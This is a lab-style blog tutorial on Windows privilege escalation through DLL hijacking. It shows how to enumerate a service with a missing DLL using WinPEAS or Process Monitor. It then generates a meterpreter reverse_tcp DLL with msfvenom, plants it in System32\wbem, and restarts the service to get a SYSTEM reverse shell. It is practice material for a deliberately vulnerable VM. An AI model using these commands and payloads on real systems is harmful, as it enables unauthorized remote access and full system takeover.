Windows PrivEsc(2) — Hijacking DLLs

This is second blog post about Windows PrivEsc series, you can read the first of it which is about Unquoted Service Paths .

DLL Hijacking

Dynamic Link Libraries (DLLs)

What are Application DLLs?

DLLs are libraries that applications/services call unto or use when started.

If the application cannot locate the required DLL, we can force the application/service to load our own DLL that will run arbitary commands which in turn will elevate our commands. This is called DLL Hijacking.

Applications usually load DLLs from any of the following Directories:

1. Application path/directory
2. C:\Windows\System32
3. C:\Windows\System
4. C:\Windows
5. C:\Program Files
6. The PATH environment


We can perform DLL hijacking on application/service DLLs that do not have a definitive path. Below is an example of a definitive path to a service’s DLL.

PATH = C:\Windows\System32\example.dll

Below is an undefined path to an application DLL which can be exploited.

PATH = example.dll

To set up and Practice this, you can download a

• Windows 7 SP1 x64bit build 7601
• Then download this batch script from here . This is a local Privilege Escalation script that will set up many vulnerable services running on your Virtual machine.

Transfer the script to your Virtual machine and run it as an Administrator. Now restart as prompted in cmd after the services were done installing.

Now open cmd on your Windows 7 and start the dll hijacking service with command:

sc start dllsvc

start dllsvc

Now to check if the service is really running, use command:

sc query dllsvc

query the service state

Now we are good to go

Exploitation Process

I’m assuming you already have foothold on the Windows 7(either a meterpreter shell or a cmd shell)

Well to start off, we can’t just assume our target is vulnerable to dll hijacking attacks. We’ll have to do some enumeration to determine if the Windows target is game. Here, we are gonna use a Windows tool called Windows Privilege Escalation Awesome Scripts Suite (WinPEAS). You can clone it from github from here. After clonning it, upload the WinPEAS64.exe binary to the Windows target(either through metasploit upload or simple python server and downloading with certutil.exe on the Windows machine).

Over here I have it uploaded into my Downloads folder

Now launch it with the parameter servicesinfo to enumerate a list of services with missing DLLs and their respective paths.

.\winPEASx64.exe servicesinfo

Going through the output of the batch script, we get some interesting information. DLL Hijack Service which is possible on the dllhijackservice.exe binary. The dll that this executable needs is not properly referenced so why don’t we create our own dll for this executable to call unto that?

enumerate services running

VIA GUI ALTERNATIVE

Using Process Monitor to list services Vulnerable to DLL Hijacking Attacks.

Let’s say you got foothold to the Windows machine via RDP. Instead of uploading winPEAS, you can rather upload a program called Process Monitor. Launch it and set the right filters and you’ll get all the information you need to know about the badly referenced dll.

Upload ProcMon.exe to the Windows target

Now launch it

Click on the Funnel icon to open the Filter Dialog

Set these Filters and click on Add

Now set this new Filter and click Add again.

After this click Apply.

Below is a list of DLLs the dllhijackservice.exe depends on.

Now that I have shown you two different ways to enumerate hijackable dll service, let’s move on to how to generate our own dll.

Creating a dll payload

I’m going to create a dll payload with metasploit. I’ll name it hijackme.dll. And I’m going to serve the payload on a simple Python HTTP server.

NB: The name of your dll payload should be the same as the one the dllhijackservice.exe calls.

msfvenom -p windows/x64/meterpreter/reverse_tcp -f dll LHOST=192.168.1.100 LPORT=6161 -o hijackme.dll

generate a custom dll

After generating the custom DLL, we can transfer it to the target system under the respective service path. In our case, the path will be the following:

C:\Windows\System32\wbem

I’m gonna navigate to that location in my first shell.

And upload the dll payload there.

upload /<PATH TO DLL>/hijackme.dll

Now set up your listener in metasploit. Set the options to the same ones you chose when creating the payload. Run and wait for a reverse shell when the dllsvc service is restarted.

listener

Now in your foothold session, restart the dllsvc service.

sc stop dllsvc

stop the service

sc start dllsvc

start service

You’ll catch a reverse shell in your listener running as NT AUTHORITY\SYSTEM

privileged shell

We have been able to elevate our privileges by identifying missing DLLs and generating a custom DLL that will be executed to provide us with an elevated Meterpreter session.